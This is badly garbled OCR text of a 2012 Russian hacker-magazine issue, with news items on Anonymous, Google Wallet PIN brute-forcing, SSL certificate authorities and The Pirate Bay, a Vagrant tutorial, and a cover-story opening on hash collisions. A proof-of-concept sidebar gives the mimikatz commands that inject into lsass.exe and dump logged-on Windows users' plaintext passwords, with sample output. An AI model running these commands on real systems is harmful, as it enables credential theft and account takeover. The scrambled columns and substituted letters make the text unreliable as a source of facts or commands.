RОР - программы для получ енной d ll' ки.

Валидный Ja vaScг ipt: tгу { х;} catch[ 1{ coпsole. log[ 'CODE, У U NO WORK '1; } http://t.co/RT JaNUij

1!!1 Комментарий: liiil Забавное мини-ис следование на тему

Один из моих фаззеров упал с крешем,- плохо, что не экс­

плуатируем о

1943-1945

ра зработчиков атомной бомбы в Ло с ­

http:Ut.co/3uNU3Jii

Причем

ГclcorelancOdЗr:

отн осятся к области те оретической физики.

:1

наименований переменны х в J avaScгipt. Н е экс плойты ломают код.

М ожет быть годным для обхода фильтров,

Разработчики лома ют код

например :1

Гclgeovedi:

Нерды- просто люди , которы е горят чем-то достаточно, чтобы тяжело над этим работать.

П одска зка: на звание

-., ....,

...

~~

, r l ~~ j

White

магическо -автома тическим

Д оро гой Гу гль, я успешно получил

5 уведомлений, 18

6 поп-апав

е-майлов

поп улярной [в области продаж) с и стемы уда ленн ого администрирования? Б ез аутентификации! Symaпtec рсАпуwhеге

исследования-в-области-ИБ>>.

12.5

выполнение произвольнаго кода.

о том, что ты

П ожалуйста, пошли мне еще.

Гclf1nux:

По жа луйста, почем у ... Ну почем у же мы до сих п о р плачем каж­

Гclthealuc:

Это неплохая идея, делать жур­ н а лирование истории консоли

н а твоем веб-сервере: >ltee -а

Гcldaveaitel:

способом на уровень <<Супер лиде рского ­

меняешь политику конфиденциальности.

-/.bash_history 1 loggeг -t <<$USER[$$] $SSH_CONNECTION>>I

дый раз, когда прои схо дят кося­ ки с

SSL. Ведь

он и так умер неск ол ько лет

Гcli0n1c: Я потерял

80

фолловеров с тех

пор как объявил , что, возможно , о дин из них от в е т с твенен за

взлом экс -мини стра обороны.

на зад. Н астало время ти хой скорби ..

1!!1 liiil

Комментарий :

Гclevacide:

И деиствительно, SSL вымирает, но

Визуальный язык интернет­

мы еще д ержимся за него . Но и уязв имости ,

конфиденциальности в основном

и провалы доверенных корневых центров,­

о защите маленьких д евочек ­

все это лишь подрывает доверие.

ХАКЕР

8 9

. . . . . WP ftwl Удале нный доступ с права ми SYSTEM для наиболее

Рар е г не поднимает ваш те к ст

Гclclarkysj:

и

Гcljoshcorman :

04/159/2012

блондиночек.

011

www.epidemz.net


-

.MEGANEWS

ИНДИЙСКИЙ MICROSOFТSTORE ВЗЛОМАЛИ ХАКЕРЫ ИЗ EVILSHADOWTEAM. Дело не ограничи­ лосьдефейсом, парни также выложили скриншоты с файлами БДмагазина .

НАСВИСТИ МНЕ ССЫЛКУ

ANONYMOUS СЛУШАЕТ

ЗВУКОВОЙАНАЛОГQR-КОДОВГОТОВКРАБОТЕ

ОТ ВЕЗДЕСУЩИХ ХАКЕРОВ НЕ МОГУТ

УКРЫТЬСЯ ДАЖЕ ФБР И ПОЛИЦИЯ

SONIC t NOТIFY CREAТING MEOIA WПН PRESENCE LМ.

1S

f.Sf

lf.YI':IS

NEWS

АВОUТ l!lilШ

IIEМOS

Б ес платно е при ­ ло же ни е Sопiс Experi ences, к оторо е пр е до ста вля е т до · ст уп к о в с е м о п исан ­

о

ным фун к циям , уже

1

вышло и доступно

VIEWERS

в в е рсия х для и Android.

iPhone

D

ели бы нам вздумалось писать обо всехдеяниях хактивистовАnопуmоus, то, наверное, пришлось бы учредить отдельное дополнение к журналу.

Однако некоторые проделки хакеров «бесчисленного ле­ гиона» все же достойны упоминания . Н апример, в прошлом месяце из-за них здорово опозорились ФБР и полиция Скотланд-Ярда. П о сооб щению Би-Би-Си, в январетекуще­ го года хакеры каким-то образом под с лушали телефонный

разговор между экспер тами ФБР и полиции' В ходе беседы сотрудники органов как раз делились информацией о са­

мих Aпoпymous и обсуж дали планы ареста членов гр у ппы , включая даты и имеющиеся доказательства. Хакеры вы­ ложили запись ра згово ра на

SONIC CAST

SONIC liVE

SONIC GOODS

Крометого были опуб ликованы фрагменты переписки по электронной почте между Скотланд-Ярдом и ФБР, гд е

~цWII..-.:10

..... ~~~ey-tch

-

YouTube, где она доступна д о

сих пор: youtu . be/p i ЗspwzUZfQ .

""""""'~

прекрасно видны адрес а остальныхучастников конфе­

ренции [ pasteЬiп . com/BG4jlhaB I. ФБР уже подтверд ило факт перехвата информации и за­ являет, что разыскивает виновников. Подразд е ление по

1]

последнее время мы частенько упоминаем на стра ни цах журнала

бо рьбе с киберпреступностью Скотланд- Я рда также сооб­

QR-коды, да и сами не редко пользуемся ими в жизни. Технология дей­

щает, чтоинцидент расследуется. Правоохранительным

ствительноудобная и, соответст венн о, набираю щая популярность.

орга нам явноочень интерес но, каким образом Анонимы

Но, думаем, многие согласятся с тем, что не всегда удоб но пытать ся навести

смогли заполучи т ь запись.

камеру с мартфона на какой-либо объект, переживая о том, хорошо ли его

видно. Команде стартапа Soпic Notify [ soп i cпoti f y. com l, очевидно, не давала по­ коя та же мысль, и из нее родилась новая техн ология - своеобразный аналог QR-кодов. Звуковой.

По задумке разработчиков, устройства на базе

iOS и Aпdгoid могут на

ультразвуковых частотах обмениваться данными небольшага объема. К при­ меру, возможностей Soпic

Notify вполне достаточн о для передачи сс ылки и ее

мгновенного открытия на телефоне.Кр оме того, ультразвуковой сигнал можно

интегрировать в любой музыкальный трек или звуковую дорожку видеороли­ ка, чтобы слушатель мог получить доступ к дополнительн ой информации. Метаданные можно встроить в любую аудиотрансляцию, что, по мнению создателей, будет востребовано в м узеях или вы ставочных гале реях, для

обеспечения посетителей разнообразными сведениями об экспонатах и их авторах. На концертахтех н ология позволит, к пример у, отк рытьсайтисп ол­ нителя, ил и обнаружит ь страницу с текстом исполняемой песни. Признаем ся, нам на ум почему-то приходят не муз еи и галереи, а несколько иные варианты

при менения технологии

:1.

• СУДОБЯЗАЛ «ВКОНТАКТЕ»

15АПРЕЛЯУОТАЗАПУ-

ВЛАСТИ ШТАТАНЕВАДА

В ПЕРВЫЕ ЧАСЫ ПОСЛЕ

выплатить компенсацию

СТИТ В МОСКВЕ СЕТЬ LТЕ,

ПРИНЯЛИИСТОРИЧЕСКОЕ

СПЕЦОПЕРАЦИИ ПОЗА-

НА САЙТЫ АМЕРИКАНСКИХ

вразмере220000рублей

работающую на частотах

РЕШЕНИЕ: официально

КРЫТИЮ

ФОНДОВЫХ БИРЖ

ввидунарушенияправинтел-

разрешили езду по т рассам

шедшей

общего назначени я роботи -

в с емирной сети с низился

NASDAO, BATS и других осуществила группа LONGwave99. Таким

на композиции группы « Ин-

2500 -2530 М Гц и 2620 -2650 М Гц . ПереходсWiМАХ на LTE с остоится в ночь с 14 на 15

зированным авто м обилям

финити >> и певицы Максим .

апреля .

без водителя .

на 2-3 %, говорятэксперты DeepFi eld Netwoгks .

ли « движение 99 '/о >> .

лектуальнойсобственности

MEGAUPLOAD, про 19 января , трафик

УСПЕШНУЮ DDOS-ATAKY

образом хакеры поддержа -

ХАКЕР

012

www.epidemz.net

04/159/2012


НОВАЯМАС OSX 10.8- Mountain Lion («Горный лев » ) nоявится в nродаж е в концелета 2012 года .

К АК ВЫЖИВАЕТ

ВЗЛОМ

RAPIDSHARE

АДВОКАТ ИЗВЕСТНОГО ФАЙЛООБМЕННИКАДАЛ ИНТЕРВЬЮ

m

ПОДБИРАЕМ

э

egaUpload закрыли, другие файловые хостинги здорово напуганы, нo R apidShaгe в это время живет и здравствует.А ведь всего два года назад файлаобменник упоминался в докладе

RIAA и

МРАА, как одно из

GOOGLEWALLET

PIN

К ВИРТУАЛЬНОМУ БУМАЖНИКУ

лектронную платежную сис т ему запустили еще в середине

Google Wallet 2011 года . Разработка

предназначена для А n dгоid-смар т фонов, имею­

«извес тных мест » по размещению пиратского контента. Как <<рап иде » удалось

щих

уйти из-под прицела правооб л а д ателей, рассказал ресурсуТоггепtFгеаk

по беспроводной связи мало г о ра ди уса дейс т вия. То

адвокат компании Дэниел Р ей мер. П риведем самые интересные тезисы из его

есть

рассказа:

в магазинах с помощью телефо н а и установ л е н ного н а н ем

Google Wallet позволяет расплачиваться за п оку п ки

специально г о приложения. Это не что иное, ка к << в ир т у­

RapidShaгe всегд а по П е рв омутребавани ю правообладателей удаляет

альный бумажник».

любые файлы, размещенные у них н а хостинге. Этим занимается специальный отдел

N FC. Испол ь зуется дан н ая система д л я платежей

Кстати, подобнаятехнология используе т ся д ляоплаты

-anti-abuse depaгtment.

проезда в Лондонском метро и в м етроЯпони и. Д л я п ер е ­

Компания разработала с п е ц иаль н ый краулер, который постоянно монито ­

рит форумы, доски объявленийиварезные блоги в поиске информации о на­

числения средств за покупку или проезд нуж н о лишь

рушении интеллектуальных прав, которые имеют место в системе RapidShaгe.

провести телефоном рядом с т ерминалом оплаты. Вопрос безо п асности п одоб н ых платежных систе м

Собранная информация оценивается, проверяется и обрабатывается все тем же отделом. Конечно, Реймер отказался сообщить подробно сти о краулере или

всегда был актуальной темой. Google заверял, что Google

назвать идентификатор бота. Но отметил, что это <<весьма сложная техноло­

Wallet отлично защищен,- к примеру, использует м икро­ схему Secuгe Element, где в заш иф рован н ам в ид е х рани т

гия>>, способ ная обойти практически любые способы за щиты форумов от неза­

пользовательск и е д анные. Она отделена от самого теле­

регистрированныхпользователей.

Еще в декабре

201 О года компания потратила большие деньги, наняв высо­ кооплачиваемую вашингтонскую фирму Dutko, которая имеет доступ в высшие эшелоны власти и там отстаивает интересы RapidShaгe.B задачу Dutko т акже

фона и ОС, так что только

Google Wa ll et може т работать

входит работа над имиджем RapidShaгe.

и защищено человеком , может быть им же и взломано.

с ней. Но, как показывает практика, все, что создано Ока з алось, подобрать РIN-код к кошельку можно путем

Еще один важный козырь живучего Файлаобменника- отсутствие пар­ тнерской программы. Таковые, по мнению правообладателей, стимулируют

брутфорса, даже без обращения к серверу Google! Виной

пиратс тво.

всему-уязвимости в архитектуре приложения.

Специалист по безопас ности Д жошуа Руби н, сотруд­

В RapidShare уверены: файловый

ник

выгляд етькак

цию . В базе обнаружиласьтаблица со странным названи­

приличный се рви с вроде

zveloLABS, решил внимательно изу ч ить внутреннюю Google Wallet хранит всю информа­

базу данных sqliteЗ , где

ХОПИН Г ДОЛЖеН

ем

Dropbo x'a, как

metadata. В таблице было всеготри строки, но в каждой

из них- крупны й блок бинарных данных.

р есnектабе л ьна я компан и я , кото р а я

Один ряд на зывается gmad _ bytes _aгe_ fun - это нечто

зан има ется исклю­

чительнолегальным

вроде зашифрованн ой файловой системы для хранения

бизнесом .

данных. Содержим ое б инарныхданных в этой строке явно предполагает, что там находится вся информация о бан ­ ковской карте , пишет Рубин. Д ругая строканазывается

devicel nfo, и для понимания

этих данных пр ишлось выяснить, чем они обработаны.

Д а н ные оказалисьскомпилированы при помощи про ­ токола P гotoco l Buffeгs. Это открытая библиотека для уни­ фикации данны х в сообщениях между системами. Чтобы прочитать эти данные, необходимо указать правиль н ый

messagefoгmat в файле .ргоtо [ P гotocol BuffeгBasics: Java l. Сделав подходящий .ргоtо, Джошуа Рубин сумел прочесть данные и был глубоко шокирован. Обнаружились

Unique

Useг IDs [UU IDI, информация об аккаунтах Google IGA IAI и Cloud to DeviceMessaging IC2DM, пуш-уведомле н ия], статус Google Wallet Setup, параметр <<TSA» !видимо,

ОБНОВИЛСЯ ЛЕГЕНДАРНЫЙ МЕДИАПЛЕЕР

Tгusted Seгvices], статус SE, и самое главное-да нн ые • .. :

'

....

-

О

'

·~

L-

-

~

'1 •

~

CaгdPгoducti oп Lifecycle ICPLCI и PIN-кoдl Хэш

VLC ОБНОВИЛСЯ ДО ВЕРСИИ 2.0 TWOFLOWER. СРЕДИ УЛУЧШЕНИЙ:

достаточно попробовать максимум

1О 000 хэш ей SHA256,

так что криптографич еская защита перестает быть про­ блемой .

Pl N-код подбирается менее чем за секунду даже

на с мартфоне, так что смысл ограничения на пять попыток ввода на сервере полностью теряется, как и смысл всей

ЭКСПЕРИМЕНТАЛЬНАЯ ПОДДЕРЖКАДИСКОВ BLU-R УИ НОВЫХ ФОРМАТОВ. ХАКЕР

PIN -кода хранится в зашифрованном виде

в SHA256. Но зная длину Pl N -ко да la э т о четыре ци фры!,

системы безопасности

zvelo LABS сообщает,

Google Wallet вообще. Эксперт Google уже п ро­

чторазработчик и

информированы абуязвимости и сейчас стараются как можно быстрее закрыть дыру. П осмотреть, как Рубин демонстрирует уязвимость, можно здесь:

youtu.be/ P655GXn E JC .

013

04 / 159/2012

www.epidemz.net


MEGANEWS

ВЫШЕЛ GOOGLE CHROME BETAДЛЯANDROID 4·Й ВЕРСИИ. Интересно, что браузер не поддерживаетflаsh .

ДОВЕРИЕ КSSL­ СЕРТИФИКАТАМ ПАДАЕТ

ЦЕНЗУРА В TWITTER И BLOGGER

ПРОШТРАФИЛСЯ ЕЩЕ ОДИН УДОСТОВЕРЯЮЩИЙ ЦЕНТР

ИНТЕРНЕТ-КОМПАНИИ БУДУТ

ВЫБОРОЧНО ФИЛЬТРОВАТЬ КОНТЕНТ

Комnания

Google

планирует вообще отключить онлай­ новые провер ки аннулированны х

SSL · сертификатов

в будущи х версия х

Chrome . Их заменят офлайновой базой аннулированны х

се ртифи катов, об· НОВЛАТЬСЯ КОТО рая

будет чере з со· фтв ер ны е аnдейты.

н

m

чередной камешек упал в огородсертификатов

SSL в част·

е поднимая шума, компания Тwittегобъявила ото м, что впредь будет блокировать сообщения пользователей в «ОТ·

дельных странах>>, чтобы авторы не нарушал и приняты е там

нормы. Такое сообщение появилось в корпоративном благе Twitteг.

ности и всех нынешних ц ентров сертификации в цел ом .

Там же поясняется, что по мере расширения сервиса, он становит·

Ц ентр сертификации Tгus twave признал факт выдачи такого

с я доступен в ст ранах, где иначе смотрят на << пределы свободы

сертифика т а коммерческой компании для ее корпора тивно й сети.

самовыражен ия>>. В некоторых странах эти пределы таковы, что

Сразу после этого был создан соотве тств ующий тикет в

существовать там Twitteг не может вовсе, нужна <<географическая

Bugzill a,

и на·

чалось активное обсуждение в г руппе mozi lla .dev.secuгity.po licy. Если

ценз ура>>. Пока компания не прибегала к новым возможностям,

удостовер яющий центр ради коммерческой выгоды позволяетс ебе

подчер кивае тся в благе. Разумеется , пользователи не замедли ли

выдать корневой сертификат некой непонятно й компании, зто д ей ·

выраз ить свое возмущение зтим нововведением, и протест под ·

ствительно может обернуться непредсказуемыми последствиями.

держало движение

Фирма может подписать что угодно, не обращая сь в удостоверяющий

тирова ть исполнительный директор Twitteг Дик Костол о. По его

центр, и становится возможной атака типа maп·in·the·middle и даже

словам, система филырации т витав [или целых аккаунтов] нужна

прослушка защищен ного трафика по SSL/ТLS. В итоге проект

Mozilla разослал

Anonymous.

Ситуацию поспешил прокоммен·

не для осуществления цензуры, а для того, чтобы сервис вообще

всем удостоверяющим центрам,

смог продолжить работу в определенных государствах. Сообщения

корневые сертификаты которых постав ляют ся в составе Fiгef ox

будут фильтроваться исключительно по запросу властей и только

и других продуктов

для пользователей сервиса в конкретной стране. Слабое какое-то

Mozilla,

письмо с требованием отозвать все вы­

данные сторон ним организациям вторичные корневые сертификаты

и уничтожи ть используемые для хранения этих сертификатов

HSM·

утешение .

Буквально на следующий день после зто го заявления еще и

Google

модули. Удостоверяющие центры должны выполнить эти треб ова ния

сообщил, что отныне компания тоже может блокироватьдоступ к от·

до

дельным благам, создаваемым на сервисе Bloggeг, по требованию

27 апреля.

Если же требования не будут исполнены,

Mozilla

грозит·

с я исключить сертификаты всех недобросовестных удостоверяющих

правительств определенных стран мира. Впрочем,

центравизсвоего списка.

оставляет читателям благо в возможность отключить переадресацию.

I•J>t>Ч'*/IW-!Ьof"'!!lll_,_

...._.,_..,.

Wolfrain.\lph.:i

Google хотя бы

WOLFRAM ALPHA - БАЗА ЗНАНИЙ И НАБОР ВЫЧИС · ЛИТЕЛЬНЫХАЛГОРИТМО~ которую часто ошибочно называют поисковиком , под·

. .. ..

..

C:.l·

вергласьсамомузначительно­

муобновлениюза последние годы. Была представлена про-

двинутаяверсияWоlfгаmдlрhа Рго. ПодписканаРго-версию

ПОДАННЫМ OCCASSIONAL GAMER, большая часть

обойдется в 4,99$ в месяц

рынкасмартфоновнабазе

12,99$длястудентов1, но

Windows Phone 7155 %1при­

INTEL ПРЕДСТАВИЛА про· цессоры Саге i5-2380P, i5· 2450Р и i5-2550K на м икро­ архитектуре Saпdy Bridge.

сейчастакжепредоставляется

надлежит НТС . Следом идут

Главное отличие новинок­

и бесплатный тестовый период

Samsung 128%1, LG 112%1 и Nokia 14%1.

заблокированный

длительностью 14дней .

ХАКЕР

011.

www.epidemz.net

GPU.

04/159/2012


.•

'

ф WeXLeГ.

ОБ ОКОНЧАНИИСЛУШАНИЙ П О ДЕЛУТНЕ т олько

PIRATE ВАУ И

НЕ

www.wexteг.гu

Электронная книга с доступом в Интернет v

Чи

м отри.

и.

v

лушаи.

П О С ЛЕДНИЕСВОДКИ О ПОПУЛЯРНОМТРЕКЕРЕ

<< Кач ай т е мои кн иги б ес nл а тн о и , ес ли они вам понра в ятс я ,

ку п ите б у мажн у ю к оп и ю . Э то ве р н ы й п уть зая в и ть инд уст р ии ато м , ч то жа дн о с ть в е д е т в ни ­

тье

13

длился с

,Ji irate ~ар

ку да ». П ау л о Коэ льо .

а к известно, судебный п роцесс - штука не быстрая. Раз­ бирате л ьство в отноше н ии а д м ин истрации<< П иратской бухты» иск л ю ч ением из этого правило не являлось-суд

2008

года.

Н овость, пришедшая в начале февраля, подводит под этим про ­

цессом о п ределенную черту [хот я и нельзя сказать, что все кончилось!. Дело в т ом, что четверо ос н ова т елей

The P iг a te В ау проиграли в В ерхов­

ном суде Ш веции свою последнюю попытку апелляции. Суд отклонил их апелляцию, оставив в силе приговор от ноября

201 О года , который 4, 8 и 10 месяцев, а также возмеще­ ние правообладателям ущерба в размере 46 миллионов крон [около 6,8 млн долларов!. По идее, теперь Гопфрид Свартхольм, Фредерик предусматриваеттюремные сроки

Нейж, Питер Сунде и Карл Лундетрем должны отправиться в тюрьму. Утешает лишь то, что в виду нюансов шведской судебной системы

[а также потому, что некото р ые и з обви ня емых более не проживают в Швеции! основатели Т РВ не намереваются ни отбывать срок, ни пла ­ тить деньги. Напротив, они планируют обратиться в Суд Европейского

с оюза и бороться дальше. Хотя сам ThePiгate B ay.oгg в приговоре суда не фигурирует, и прямого поста н овления о его закрытии нет, нынешняя

администрация[ккоторойупомянутаячетверкауженеотносится,на данный момент в команде не осталось ни одного из тех , кто начинал это

дело), решила перестраховаться. Самые внимательные наши читатели наверняка заметили, что в февралетрекер переехал в шведскуюдо­ менную зону .SE, где и остается на моме н т написания этих строк. Таким

образо м«Пиратскуюбухту»укрываютотамериканскихправоохрани­ тельных органов, которые т оже давноточатзуб на популярный ресурс. Поте м же причинам ТРВ в этом месяце начал активный переход на mаgпеt-ссылк и вместо tоггеnt-файлов. Если на серверах «Бухты»

не будет ничего криминального, даже tоггеnt-файлов [каковые,

WEXLER.

в об щем, тоже не являются чем-то плохим, но это еще нужно до­

Т700б

казывать в суде!, обороняться трекеру станет еще легче. К тому же, это nозволяет здорово экономить место на серверах. Пользовател и

toггentfгeak.com уже проверили nосле д нее утверждение: по их данным, общий размер базы трекера сейчас составляет всего мегабайта, или

90

164

мегабай т в архивированном виде' Вот уж дей­

Лучший выбор бесплатных книг

ств ительно, компактность налицо. Н о, nо м им о судов и переездов,

ад ми н истрация <<Бухты» по-nрежнему борется за свободу инфор­

и популярные новинки.

мации в целом. Яркий тому пример-эксперимент по nродвижению

Скачивайте и читайте на

писателей, музы кантов и других творцов - The Ргоmо В ау. П ервым

www.wexLer.ru!

«n родвигаемым>> [хотя, ко н ечно, скорее это он продвигал д а н ный

проектl стал nисатель П ауло Коэльо, чье лицо недавно м ожно было наблюдать на главной стра н ице тоже не одобряет

SO PA и

The Piгate Вау. Оказывается, П ауло

пишет, что продажи его бумажных книг

<<МЕТРО 2033>> Д МИТР И Я ГЛУХ О В С КОГО И ЕЩ Ё

Cl.

только выросли с тех пор, как читатели разместили их н а Р 2Р­

<(

сай тах. В целом, авторские раз д а ч и не новость, нотакой рекламы

о

ДВА РОМАНА КУЛЬТО В ОЙ СЕ РИ И БЕСПЛ АТНО В ЭТО Й ЭЛЕКТ Р О ННО Й КНИГЕ WEXLER

им, пожалуй, еще никто не делал. Коэльо призвал всех творческих

людей поддержать идеютрекера.

Х АКЕР

04/159/2012

YOII

www.epidemz.net

ll!!!IJ

ТЕЛЕФОН ГОРЯЧЕЙ ЛИНИИ: 8 (800) 200 96 60


.HEADER

КОЛОНКАСТЁПЫИЛЬИНА

О БЬIСТРОМ СОЗДАНИИ ВИРТУАЛЬНЬIХ МАШИН ЗА Д АЧА

команда <<Ьох

add

<имя виртуальной машины»>

Один из важных плюсов облачных се рви­

отвечает непосредственно за создание вирту­

сов-возможность быстро поднять столько

альной машины.

серверов, сколько нужно. Хочешь два- будет тебе два. Хочешь сто- два клика мышью и

В качестве параметра ей передается путь до специального Ьох-файла- контейнера,

будет сто. Все зависит только от твоего ко­

позволяющего быстро развернуть на вирту­

шелька, платформа же позволяет разверн ут ь

альной машине нужную ОС. Мы указали не

столько виртуальных серверов [с нужными

просто путь, а ссылку: в этом случае Vagгant

ресурсами), сколько тебе нужно. С виртуаль­

сам выкачивает из сети образ.

ной машиной на домашнем компьютере такой

Команда

<<init>>

инициализирует ОС, причем

фокус не проходит. Чтобы создать виртуалку,

в качестве параметра необходимо указать

задать ей нужные настройки и, что муторнее

тип системы: в нашем случае это 32-битная

всего, установить ОС. уходит уйма време-

Ubuntu Lu cid [10.04)Лосле выполнения этих

ни. В один момент мне стало интересно: а

двух команд создается полностью работоспо ­

можно ли как-то автоматизировать процесс и

собная виртуальная машина с

разворачивать новые виртуальные машины

Посл едняя команда- <<vagгant

по-настоящему быстро? Ну, то есть указать

запускает ее в фоновом режиме.

что-то вроде: «Хочу три виртуальные машины

512 Мб на борту. up»- лишь

Таким образом можно создавать и запу­

с такими-то настройками и установленную на

стить нужное количество виртуалок. Управ ­

них

лять всем этим хозяйством можно опять же

Ubuntu

последней версии>>- и получить

За п уск вирт у ально й м а ш и ны ч е ре з Vagraп t

Vagrantbox.es Thesestar'ldaldleЩ)Iatesarecarledьasetю:r~ aJ'\dtr.swetlsote,ssнnptya~stottюJ.~peopleha...e Ьflf>nr'llceet\OUghtoiТiilkepiA:I~ct,o~vallaЬie

Suggest а

Вох

э ти три виртуальные машины без лишнего

через консоль Vagгant . Работающую виртуаль­

add•ttothe~stl!elow

геморроя. В поисках подходящего решения

ную машину можно оставить:

AvaiJaЬi e

Boxes

я наткнулся на открытый проект Vagгant

[ vagгantup . com ).

vag r ant suspe nd

AeQir

Чтобы посмотреть статус каждой из вир­

РЕШЕНИЕ

туальной машины, есть специальная команда

Используя в качестве основы бесплатный

~

41 AUP

(DeЬwl

AegtfWDeoaт{SiaЬie

для мониторинга :

"40<\J

и потому особенно любимый нами Oгacle's

ViгtuaiBox [4.0.х или

,CJA,eQir(OeЬraгo

~f>4.bl)

lltp

4.l.x), Vagгant позволяет

~graf11.ьaseo~mages

s3 arтw:onaws

tonWagrarc-deЬ!aМE!м)'-

05ЬФ<

vagrant status

создавать и конфигурировать виртуальные К любой из гостевых ОС можно подклю­

машины динамически.

Как это происходит, предлагаю рассмотреть

прямо на примере. Загружаем с

читься по

SSH,

используя сам Vagгant:

Н а с а й т е vа gr а пtЬо х.еs до с т у пны обр аз ы разны х ОС для б ы ст р о г о раз ве рт ыв ания

downloads.

vagгantup . c om нужную версию дистрибутива

[есть версии для Windows, Linux, Мае

05 Х)

vagrant ssh

и

поднимаем наш первый инстанс [виртуальную машину):

Если запустить приложение без пара ме­ тров, то оно выдаст список всех доступных команд.

$ vagrant

Ьох

add lucid32 http: // fi les. vagrantup.com/lucid32 . box $ vagrant init lucid32 $ vagrant up

Пар аметры гостевых ОС можно отконфигу­

рировать[наnример, проnисатьстатические IP), задав нужные настройки в сnециальном с криnте Vagгantfile, который nишется на

Ruby.

С его же помощью можно, к nримеру, про ­ Три команды- и новая виртуальная

бросить nорты до нужной тебе виртуальной

машина с установленной ОС запущена [если,

машины. И , конечно же, ты можешь создавать

конечно, ты не забыл предварительно уста­

свои Ьох-файлы, из которых далее быстро раз­

новить ViгtuaiBox)! Как несложно догадаться,

вертывать гостевые ОС.

К одпро ек т а н а пи с ан на Ruby

ХАКЕР

016

www.epidemz.net

04 / 159/ 201 2


Proof-of-Concept ИЗВЛЕЧЬ ПАРОЛИ ПОЛЬЗОВАТЕЛЕЙ

WINDOWS

ИЗ ПАМЯТИ

Существует немало способов и специальны х утилит, чтобы извлечь хэ ши пользоват ел ь ских паралей из системы. А можно извлечь параль в открытом виде? Можн о!

О ЧЕМ РЕЧЬ?

КАК ЭТО ВЫГЛЯДИТ? mimikatz. Вывод

Не так давно мы делали комплексный материал о том, как можно

Попробуем

сдампить пользовательские парали из Windows-cиcтeмы. Ути­

это не должно nугать: чтобы увидеть па роли, не нужно говорить на

лита

языке Шарля Де Голля:

Windows Cгedentials Editoг- одно из наиболее известных

будет на французском языке, но тебя

и универсальных решений. Однако н е давно французские ис­

следователи выпустили совершенно убойную наработку

mimikatz

mimikatz

1 .е х86

(pre-alpha)

/ * Traiteme nt du Kiwi • ;

[ Ыog.gentilkiW I .com/ mimikatz ]. Помим о уже и звестных приема в, она умеет ... извлекать парали пользователей в открытом виде .

Правда , только тех, которые осуществили вход в системе. Сна­

mimikatz # privilege: : debug Demande d'ACTIVATION du privilege : SeDebugPrivilege

ок

чала мы п одумали, что это фэйк и nодстава, но первый же запуск

утилиты подтверди л- все работает. Прога предоставляет свою собственную консоль, из которой можно запустить необходимые

модули для различных ситуаций [конц епция «швейцарского ножа»]. Для извлечения паралей в виде открытого текста nонадо­ бится всего три команды:

mimikatz # pri vilege: :debug mimikatz # iпject: :process lsass . exe sekurlsa.dll mimikatz # @getlogonPasswords

mimikatz # inject: : process lsass.exe sekurlsa . dll PROCESSENTRY32(lsass.exe).th32ProcessiD = 488 Attente de connexion du client . . . Serveur connecte а un client ! Message du processus : Bienvenue dans un processus distant Gentil Kiwi SekurLSA : librairie de manipulation des donnees de sec urites dan s LSASS mimikatz # @getlogonPasswords Authentification Id : е;43 4 898 Package d'authentification : NTLM Utilisateur principal : Gentil User Domaine d'authentification : vm-w7-ult msvl_e : lm{ е52сасб7 419а9а224а З Ые8fЗfабсЬбd }, ntlm{ 8846f7eaee8fЫ17adeбbdd8ЗeЫ586c } wdigest password password tspkg :

КАК ЭТО РАБОТАЕТ? Казалось бы: нафига хранить парали в открытом виде, если вы­ полнить авторизацию можно даже с nомощью хэша? Н а самом

деле, по с леднее возможно не везде. Поэтому в винде есть специ­

альный поставщик безопасности wdigest [ technet . micгosoft.com/ en-us/libгaгy/cc778868[W5 . 10 ] . asi!XI. чтобы поддерживать такие типы авторизации как, например, НТТ Р

Digest Authentication

и другие схемы, где необходимо з нать па роль [и хэша недоста­ точно]. Напо сле док скажу, что буквально в момент выхода жур­ нала в печать аналогичный функционал появился и в упомянутой Французский вывод

ХАКЕР

mimikatz не должен тебя

пугать

выше утилите

WCE . I

017

04/159/2012

www.epidemz.net


COVERSTORY

Sanjar Satsura [sanja r0xakep.ru, twitter.com/sanjar_satsural

В современном IТ-мире контрольную сумму файла

или любых других важных данных принято считать фундаментом для подтверждения неизменности исходной информации. Но если ты вспомнишь историю с руткитом Stuxпet, то поймешь, что уязвимости в популярных алгоритмах для

расчета таких сумм могут привести к большим

катастрофам . Давай проверим это.

www.epidemz.net


Опа с ный двойник

E''·'tJ:II:ttt На нашем диске ты

Вся информация

найдешь исходники,

предоставлена

описанные

исключительно

в статье, примеры

в ознакомительных

поддельных

целях. Ни редакция,

сертификатов ,

ни автор не несут

а также видео ,

ответственности за

в котором наглядно

любой возможный

покаэан процесс

вред, причиненный материалами данной

генерации коллизий.

статьи.

ЛЕГКИЙ СПОСОБ ПОДДЕЛКИ

КОНТРОЛЬНОЙ

СУММЫ ИЭЦП с помощью

коллизий

www.epidemz.net


COVERSTORY

Те о

ИЯ

недавний взлом keгnel.oгg: тогда лишь самые опытные админи­

38 той 57, 76 и так далее . Таким образом, nары входных значений [38,57 ], [38.761 образуют КОЛЛИЗИИ ДЛЯ ХЭШ-фуНКЦИИ F[x] . Чтобы хэш-функция F считалась криnтаграфически стойкой,

страторы заметили подвох, сравнив контрольную сумму скачанных

она должна удовлетворять трем основным требованиям, на которых

исходников с контрольной суммой, nредставленной на сайте.

основано большинство применений хэш-функций в криnтографии.

Всегда ли ты проверяешь контрольную сумму скачанных из сети файлов? Думаю, нет. Хотя, конечно, для большинства юниксоидов это

привычное дело, ведь целостность и достоверность скачанных обра­ зов и исходниковпорой играет важную роль. Достаточно вспомнить

Ты наверняка знаешь, что контрольная сумма файла зачастую

же хэш-сумму, что и у. В частности, для входного значения

же хэш-суммой будут обладать входные значения

1.

вестными из которых являются

MD4, MD5

и

SHA-1 . Однако

F[x]=m.

с недавних

пор встала огромная проблема подтверждения целостности исходной

Необратимость: для заданногозначения хэш-функции mдолжно быть nрактически невозможно найти блокданных х, для которого

nредставляет собой криnтографические хэш-функции, самыми из­

2.

Стойкость к коллизиям nервого рода: для заданного сообще н ия

информации при помощи более криптастойких алгоритмов хэширова­

m должно быть nрактически

ния [контрольных сумм]. Имя этой nроблемы- коллизии криптогра­

общение n, для которого F[n] = F[m ].

фических хэш-функций. Так, наnример, если хэш-функция исполь­

зуется для создания цифрового ключа, то умение строить для нее

3.

невозможно подоб р а т ь другое со­

Стойкость к коллизиям второго рода: должно быть nракт и чески не­ возможно nодобрать nару сообщений, имеющих одинаковый хэш.

коллизии равносильно умению nодделывать цифровой ключl Именно nоэтому в идеале не должно существовать сnособа поиска коллизий для криnтографических хэш-функций более быстрого, чем nолный

Существует большое количество алгоритмов хэширования

с различными характеристиками [разрядность, вычислительная

перебор [брутфорс] . Если для некоторой хэш-функции находится более

